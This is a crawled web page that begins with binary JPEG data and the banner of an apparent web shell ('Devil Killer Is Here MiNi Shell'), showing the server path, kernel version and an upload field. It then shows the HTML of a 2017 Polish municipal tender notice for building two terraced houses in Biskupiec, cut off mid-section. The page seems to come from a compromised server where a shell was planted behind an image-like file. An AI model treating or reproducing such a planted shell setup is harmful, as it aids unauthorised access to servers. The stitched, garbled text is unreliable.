JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170303/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170303/35985-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.biskupiec.biuletyn.net' target='_blank'>http://www.biskupiec.biuletyn.net</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 35985 - 2017
              z dnia 2017-03-03 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Biskupiec: BUDOWA DWÓCH BUDYNKÓW SZEREGOWYCH CZTEROSEGMENTOWYCH W BISKUPCU<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Biskupiec, krajowy numer identyfikacyjny
              53281400000, ul.
              ul. Rynek 
              1,
              13-340  
              Biskupiec, woj.
              warmińsko-mazurskie, państwo
              Polska, tel.
              56 4745057 do 59, e-mail
              ugb@gminabiskupiec.pl, faks
              564 747 952.
              <br />
              Adres strony internetowej (URL): ww.bisupiec.biuletyn.net<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.biskupiec.biletyn.net</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.biskupiec.biuletyn.net</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Urząd Gminy, ul. Rynek 1, 13-340 Biskupiec</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>BUDOWA DWÓCH BUDYNKÓW SZEREGOWYCH CZTEROSEGMENTOWYCH W BISKUPCU<br /><b>Numer referencyjny: </b>ZP 271.6.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiot zamówienia obejmuje wykonanie zadania inwestycyjnego pn.:Budowa dwóch budynków szeregowych czterosegmentowych w Biskupcu
 Przedmiotem zamówienia jest robota budowlana  dwa budynki mieszkalne szeregowe, zlokalizowane w m. Biskupiec dz. nr 464/16 gm. Biskupiec
Opis budynku
- budynek mieszkalny szeregowy wykonany w technologii tradycyjnej murowanej. Budynek złożony z 2 szeregów czterosegmentowych. Wykonany jako parterowy z poddaszem nieużytkowym. Konstrukcja ścian murowana, dach kratownica drewniana dwuspadowa o kącie 30st kryta blacho dachówką. Poszczególne segmenty oddzielone ścianami nośnymi gr 24 cm wystającymi 30 cm ponad połać pokrycia.
Dane ogólne
SEGMENT  A (4 SZTUKI POWTARZALNE 2 SZEREGI
1.	Powierzchnia zabudowy   245,86 m2
2.	Powierzchnia użytkowa  69,62m2
3.	Kubatura-245,86 m3
4.	Ilość izb - 9
Fundamenty
Zaprojektowano dla wytrzymałości dopuszczalnej gruntu gnf = 1,8 MPa .
Ławy żelbetowe wylewane z betonu C16/20 zbrojone stalą A-0 (St0S b) , 
A-III (34GS) o wysokości 30 cm . Strzemiona o6 , stal A-I ST3SX co 30 cm.
Zbrojenie ław pod ściany zewnętrzne i wewnętrzne nośne oraz zbrojenie ław w narożach należy uciąglić przez stosowanie w zbrojeniu podłużnym zakładów min 750 mm . Otulina zbrojenia powinna wynosić min 5 cm. Ławy posadowione  1.20 m poniżej poziomu terenu . Szerokość ław przyjęto  60 cm i 50 cm. Stopy fundamentowe pod słup   o wysokości 30 cm żelbetowe , zbrojone siatką z prętów 0 12 o oczkach 10 x 10 cm. Ławy i stopy posadowić na gruncie rodzimym  , na chudym betonie klasy C 8/10 o gr min 5 cm .
Ściany fundamentowe
ściany fundamentowe grubości  24 cm , wykonane z bloczków betonowych C 16/20 na zaprawie cementowej . Ściany fundamentowe i fundamenty należy zaizolować przez dwukrotne smarowanie środkiem izolacyjnymi  
Ściany zewnętrzne
ściany zewnętrzne wykonane z pustaka gazobetonowego , grubości 24 cm od 600, układane na zaprawie cementowo wapiennej ,
Ściany wewnętrzne
ściany wewnętrzne  z  cegły ceramicznej pełnej  gr.6 i 12 cm/działowe/
Dach
Wiązar drewniany deskowy o rozstawie wiązarów ok 1,00m.  Kratownica wykonana z desek 3,2x20 z drewna C27 impregnowana wgłębnie i czterostronnie strugana.
Wieńce i nadproża
-	nadproża okienne i drzwiowe prefabrykowane L-19 wg rys. konstrukcji
-	wieńce obwodowe 24 x 24 cm wykonać z betonu klasy C16/20  , zbrojenie wykonać ze stali A-III (34GS) oraz A-0 (St0S-b) , 4 x o 12 , strzemiona o 6 co 20 cm , Zbrojenie w narożach należy uciąglić stosując zakłady   min 750 mm .
Dach  konstrukcja 
 a)   Dach o konstrukcji nośnej drewnianej dwupołaciowy , kryty blachodachówką  . Dach oparty na ścianach zewnętrznych za pośrednictwem murłat Murłaty należy kotwić do wińców co  ok. 1,2 m kotwami stalowymi min M12 zatapianymi w trakcie betonowania wieńców lub systemowymi kotwami rozporowymi . Drewno konstrukcyjne C 27 .Konstrukcja dachu kratownica drewniana
Warstwy pokrycia :
-	blachodachówka
-	łaty 3x5 cm
-	kontrłaty 2,5x5 cm
-	papa
-	deskowanie 2,5 cm
-	folia izolacyjna
-	wełna mineralna 20cm
-	wiązar dachowy
-	płyty karton-gips 12,5 mm
-	elementy drewniane zakonserwować środkami bio- i uniepalniającymi -np FOBOS
Przewody wentylacyjne i spalinowe
 przewody wentylacyjne  o 15 z pustaków wentylacyjnych lub dymowych  19 x 19 cm  , obudowane cegłą pełną gr 12 cm .
- przewód dymowy od kominka typu kształtka  20+W.
Uwaga :
- w obudowie wspólnej przewodu spalinowego z wkładem ze stali kwasoodpornej i kanałów wentylacyjnych sąsiedni kanał ( do spalinowego ) wykonać z pustaków dymowych ( odpornych na wysokie temperatury )
- na wylocie przewodów spalinowych zaleca się zastosowanie  regulatora ciągu kominowego , który zapobiega wdzieraniu się wiatru do komina  , cofaniu się spalin i ich wykraplaniu.
- również w przypadku przewodów wentylacyjnych poddasza ( o niewielkiej wysokości ) zaleca się zastosowanie na wylotach przewodów nasad kominowych , mających za zadanie ochronę kominów przed zawiewaniem oraz wspomaganie ciągu kominowego .
Stolarka
-	okna i drzwi drewniane typowe i indywidualne z zachowaniem wymiarów zewnętrznych w świetle otworów.
-	drzwi zewnętrzne drewniane o współczynniku przenikania ciepła  Uk =1.0 W/( m2K)
-	stolarka okienna  o współczynniku przenikania ciepła Uk = 1,1 W/( m2K)
-	należy stosować stolarkę okienną z mikrowentylacją.
-	Przeszklenia w drzwiach wejściowych i tarasowych zaleca  się  szybę P4 (bezpieczne antywłamaniowe) 
Izolacje
a)   izolacja przeciwwilgociowa 
-    elementy betonowe stykające się z gruntem zabezpieczyć 2 x środkiem impregnacyjnym                  
- izolacja pozioma murów -dwie warstwy papy na lepiku na gorąco lub izolacja z dyspersji asfaltowo-gumowej
- pod parapetami i czapkami kominowymi - dwie warstwy papy na lepiku na gorąco lub izolacja z dyspersji asfaltowo-gumowej
- izolacja podłogi na gruncie  1 x papa termozgrzewalna lub 2 x folia PE
- izolacja dachu  folia wysokoparoprzepuszczalna zbrojona układana na krokwiach
b) izolacja paroszczelna
- obudowa  płyt G-K poddasza  dla zapewnienia ochrony przeciwwilgociowej warstw izolacji termicznej zaprojektowano paroizalację  folię paroszczelną gr 0,15 mm pod izolację termiczną poddasza oraz dach nad poddaszem
- posadzka nad parterem  należy zastosować folię paroszczelna pod posadzkę jako paraizolacje
c) izolacja termiczna
- podłoga na gruncie  poziomie 10 cm płyty styropianowe dach-podłoga 
 Uk= 0,39 W/( m2K) , w pionie od poziomu ławy fundamentowej do poziomu -0,15  zastosować polistyren ekstrudowany gr 10 cm
- strop nad parterem  zastosować płyty styropianowe 
dach-podłoga  Uk= 0,39 W/( m2K) gr 3 cm
Roboty wykończeniowe 
podłogi i posadzki 
  podkłady betonowe gr 10 cm na podkładzie 15 cm zagęszczonego piasku
a)  posadzka w łazienkach i pom. kotłowni :
- posadzka ceramiczna  terakota na kleju   - 2cm
- gładź cementowa                                        - 5 cm
- folia PE z wywinięciem 10 cm na ściany   - 0,15 mm
- płyty styropianowe Termo Organika Gold dach-podłoga  - 10 cm  ( 3 cm poddasze )
- 2 x folia PE
- chudy beton gr 10 cm
-ubity grunt rodzimy zagęszczany warstwami
b)  posadzka w wiatrołapie , holu i kuchni :
- posadzka ceramiczna  terakota na kleju   - 2cm
- gładź cementowa                                        - 5 cm
- folia PE z wywinięciem 10 cm na ściany   - 0,15 mm
- płyty styropianowe dach-podłoga  - 10 cm                         
- 2 x folia PE
- chudy beton gr 10 cm
-ubity grunt rodzimy zagęszczany warstwami
c)  posadzki w pokojach :
- panele                                                      - 1,2cm
- gładź cementowa                                        - 5 cm
- folia PE z wywinięciem 10 cm na ściany   - 0,15 mm
- płyty styropianowe dach-podłoga  - 10 cm   ( 3 cm poddasze )
- 2 x folia PE
- chudy beton gr 10 cm
-ubity grunt rodzimy zagęszczany warstwami
Gładzie cementowe i wylewki cementowe należy dylatować  obwodowo , w linii ościeży oraz na polach o wymiarach 3 x 3 m
Tynki- wewnętrzne  tynk trzeciej kategorii wapienno- cementowy, alternatywnie tynki gipsowe 
Parapety
-	parapety wewnętrzne - konglomerat na ścianach murowanych i drewniane na ścianach drewnianych
-	parapety zewnętrzne  z blachy ocynk 0,55  mm w kolorze pokrycia dachu
Wykończenie ścian
- we wnętrzu malowanie farbą np. akrylowa na gruncie, w pomieszczeniach mokrych okładzina z płytek ceramicznych ściennych na klej, w pokojach drewniane klejone
 Dach - pokrycie
Dach kryty blachodachówką. Dach projektuje się jako nie rozporowy .Komora wentylacyjna , umożliwiającą naturalną cyrkulację powietrza poprawia jakość cieplna oraz trwałość materiałów izolacyjnych . Wloty powietrza umieszcza się w linii okapu , dodatkowo zabezpiecza siatka przeciw owadom , zaś wyloty w górnej części dachu z dwóch stron lub przy użyciu wywietrzaków systemowych. W ścianach szczytowych umieścić dwie kratki wentylacyjne nawiewne 14x20 cm dla wentylacji przestrzeni nieużytkowej dachu  dla każdej ze ścian szczytowych . Pod płyty gipsowo kartonowe wykończeniowe zastosować paraizolacje a pod szczelinę wentylacyjna na warstwie ocieplenia folię wysokoparoprzepuszczalną .  
Obróbki blacharskie
-	rynny dachowe  15 cm , rury spustowe  12 cm z blachy stalowej powlekanej w kolorze pokrycia dachu gr. 0,55 mm
-	na połaci dachowej zamontować płotki przeciwśnieżne wg rozwiązania systemowego oraz otwory wentylujące połać dachową w okapie i w górnych krawędziach połaci , Ławy kominiarski i stopnie  systemowe  .
 Instalacje
 Przewiduje się wyposażenie budynku w następujące instalacje :
-przyłącze elektryczne  zaprojektowane w oparciu o warunki techniczne 
-przyłącze wodociągowe  zaprojektowane w oparciu o warunki techniczne na podłączenie do sieci wodociągowej 
-przyłącze kanalizacyjne  odprowadzenie do szczelnego zbiornika
-odprowadzenie wód opadowych  powierzchniowe .
PONADTO:
W ZWIĄZKU Z FAKTEM ,IŻ NA TERENIE LOKALIZACJI DOMÓW ZNAJDUJĄ SIĘ OBECNIE POMISZCZENIA GOSPODARCZE I BARAK MIESZKALNY WYKONAWCA, W PRZYPADKU KOLIZJI PRZY BUDOWIE I DOMU ZOBOWIĄZANY JEST DO USUNIĘCIA PRZESZKÓD TJ. EWENTUALNE ROZEBRANIE BUDYNKÓW GOSPODARCZYCH I BARAKU MIESZKALNEGO PO WYKONANIU WSZELKIEJ DOKUMENTACJI NIEZBĘDNEJ DO ROZBIÓRKI BUDYNKÓW I UZYSKANIU ZEZWOLENIA NA ROZBIÓRKĘ.
PONADTO PRZED PRZYSTĄPIENIEM DO WYKONYWANIA II BUDYNKU WYKONAWCA ZOBLIGOWANY JEST DO ROZBIÓRKI PO UPRZEDMIN PRZYGOTOWANIU DOKUMENTACJI ROZBIÓRKOWEJ I UZYSKANIU ZGODY NA ROZBIÓRKĘ ZLOKALIZOWANEGO W MIEJSCU BUDOWY II BUDYNKU BARAKU MIESZKALNEGO.
WSZELKIE KOSZTY ZWIĄZANE Z W/W POKRYWA WYKONAWCA.
Szczegółowy opis przedmiotu zamówienia zawiera:
a)	dokumentacja projektowa / opis techniczny stanowiący zał. nr 9 do siwz
b)	specyfikacja techniczna wykonania i odbioru robót budowlanych stanowiących zał. nr 10 do siwz
wykonawca wykona przedmiot zamówienia na podstawie dokumentacji projektowej, przeprowadzonej wizji lokalnej , SST , siwz wraz z załącznikami, pytaniami  i odpowiedziami  udzielonymi w trakcie procedury o udzielenie zamówienia publicznego oraz przedmiarami robót, a także obowiązującymi przepisami szczegółowymi i sztuką budowlaną oraz zapewni niezbędną obsługę geodezyjną wraz z okresem gwarancji i rękojmi.
2.	Jeżeli w opisie przedmiotu zamówienia znajdują się jakiekolwiek znaki towarowe, patent czy pochodzenie  należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie ofert równoważnych o parametrach techniczno /eksploatacyjno /użytkowych nie gorszych niż te, podane w opisie przedmiotu zamówienia. Podstawa prawna: art. 29 ust. 3 Ustawy Prawo Zamówień Publicznych /
3.	Wszystkie wskazane z nazwy materiały i technologie użyte w dokumentacji projektowej należy rozumieć jako określenie wymaganych parametrów technicznych i standardów jakościowych. Przedstawione parametry stanowią minimum techniczne i jakościowe oczekiwane przez Zamawiającego i będą stanowiły podstawę do oceny ewentualnych materiałów równoważnych. Materiały przed wbudowaniem będą przedstawione Zamawiającemu do akceptacji.
4.	Realizacja zamówienia podlega prawu polskiemu, w tym w szczególności ustawie z dnia 7 lipca 1994r. Prawo budowlane.
5.	Zamawiający informuje, że zgodnie z art. 30 ust. 8 ustawy Pzp wymagania , o których mowa w przywołanym przepisie Zamawiający określił w SST stanowiących załącznik do siwz. W przywołanych w opisie przedmiotu zamówienia norm, aprobat, specyfikacji technicznych i systemów odniesienia, o których mowa w art. 30 ust. 1-3 ustawy Pzp Zamawiający dopuszcza rozwiązania równoważne opisywanym w w/w dokumentacji
6.	Zamawiający żąda wskazania przez Wykonawcę części Zamówienia, których wykonanie zamierza powierzyć podwykonawcom i podania przez Wykonawcę firm podwykonawców.
<br /><br /><b>II.5) Główny kod CPV: </b>45000000-7<br /><b> Dodatkowe kody CPV:</b>45261210-9,
                45453000-7,
                45232460-4,
                45330000-9,
                45331100-7,
                45321000-3<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/10/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia szczegółowego warunku  tym zakresie , wykonawca składa oświadczenie o spełnianiu warunku udziału<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia szczegółowego warunku  tym zakresie , wykonawca składa oświadczenie o spełnianiu warunku udziału<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca spełni warunek jeżeli wykaże: 1)doświadczenie zawodowe: 
dla uznania że Wykonawca spełnia warunek posiadania doświadczenia zamawiający, żąda by wykonawca wykazał, iż w okresie ostatnich 5 lat, (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie) przed upływem terminu składania ofert wykonał, co najmniej 1 zadanie odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów na rzecz których roboty te zostały Wykonane . Przez zadanie odpowiadające rodzajem robót budowlanych stanowiących przedmiot zamówienia, należy rozumieć budowę obiektów takich jak: domy, mieszkania, bloki mieszkalne o kubaturze min. 400 m3 w ilości m.in. 1 budynku polegającą na wybudowaniu i kompleksowym wykończeniu budynku
Wykonawca złoży także oświadczenie, że dysponuje wiedzą i doświadczeniem potrzebnym do wykonania zamówienia. 
Ocena spełniania warunku nastąpi na podstawie wstępnego oświadczenia zgodnie z Załącznikiem nr 2 do SIWZ. Następnie na podstawie wypełnionego przez wybranego Wykonawcę załącznika nr 5 do SIWZ Wykazu wykonanych robót. Do przedmiotowego załącznika nr 5 należy dołączyć dowody potwierdzające, że wykazane roboty zostały wykonane w sposób należyty oraz wskazujących, że zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że chociaż jeden z nich lub łącznie spełniają w/w warunek, 
2)kadra techniczna: Zamawiający uzna warunek za spełniony, jeżeli Wykonawca na czas realizacji zamówienia będzie dysponował osobami o odpowiednich kwalifikacjach zawodowych niezbędnych do wykonania zamówienia tj. 
a)Kierownik robót w specjalności konstrukcyjno-budowlanej pełniący jednocześnie rolę kierownika budowy. 
Minimalne wymagania: 
-posiadający uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności konstrukcyjno-budowlanej lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania, których w aktualnym stanie prawnym posiadają uprawnienia budowlane w/w specjalności umożliwiające zrealizowanie przedmiotowego zamówienia
- posiadający doświadczenie na stanowiskach kierowniczych w bezpośrednim kierowaniu lub nadzorowaniu robót budowlanych co najmniej jednego zadania polegającego na  budowie obiektów takich jak: domy, mieszkania, bloki mieszkalne
b)Kierownik robót w specjalności sanitarnej. 
Minimalne wymagania:
-posiadający uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania, których w aktualnym stanie prawnym posiadają uprawnienia budowlane w/w specjalności umożliwiające zrealizowanie przedmiotowego zamówienia, 
-podsiadający doświadczenie na stanowiskach kierowniczych w bezpośrednim kierowaniu lub nadzorowaniu robót sanitarnych, przy czym posiada doświadczenie w realizacji lub nadzorze (jako kierownik robót lub inspektor nadzoru) co najmniej jednego zadania polegającego na budowie obiektów takich jak: domy, mieszkania, bloki mieszkalne  o kubaturze min. 400 m3
c)Kierownik robót w specjalności elektroenergetycznej. 
Minimalne wymagania:
